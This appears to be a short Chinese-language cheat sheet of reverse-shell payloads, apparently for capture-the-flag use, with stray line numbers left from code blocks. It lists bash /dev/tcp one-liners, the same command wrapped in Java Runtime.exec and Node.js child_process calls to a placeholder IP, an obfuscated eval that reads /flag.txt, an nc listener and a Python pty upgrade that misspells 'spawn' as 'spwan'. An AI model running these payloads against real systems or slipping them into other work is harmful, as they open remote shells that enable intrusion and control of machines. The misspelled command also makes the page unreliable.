各种弹shell
# bash
/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1
1
# java
java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')
1
# javascript
process.mainModule.require('child_process').exec('')
global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx.xx.xxx.xxx/7777 0>&1\"')
eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat /flag.txt').toString()")
1
2
3
2
3
# 接收
nc -ltvp port
1
python3 -c 'import pty;pty.spwan("/bin/sh")'
1
上次更新: 2021/08/02, 11:26:39